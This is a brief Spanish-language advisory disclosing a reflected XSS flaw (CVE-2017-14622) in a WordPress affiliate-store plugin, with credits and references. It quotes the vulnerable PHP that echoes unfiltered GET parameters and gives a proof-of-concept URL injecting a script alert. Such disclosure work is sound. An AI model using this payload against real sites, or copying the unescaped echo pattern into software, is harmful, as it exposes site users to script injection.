Localizado un Cross-site scripting en el plugin «2kb Amazon Affiliates Store» versión 2.1.0 de wordpress (https://es.wordpress.org/plugins/2kb-amazon-affiliates-store/).
La inexistencia de un filtrado correcto en las variables «page» y «kbAction» permite la inyección de código mediante el método GET.
<input type="hidden" name="page" value="<?php echo $_GET['page'];?>"/> <input type="hidden" name="kbAction" value="<?php echo $_GET['kbAction'];?>"/>
Ejemplo de la inyección:
http://localhost/wordpress/wp-admin/admin.php?page=kbAmz&kbAction=demo»><script>alert(1234)</script>
- Agradecimiento del desarrollador:
https://es.wordpress.org/plugins/2kb-amazon-affiliates-store/#developers - Publicación en Packetstormsecurity:
https://packetstormsecurity.com/files/144261/WordPress-2kb-Amazon-Affiliates-Store-2.1.0-Cross-Site-Scripting.html - CVE:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14622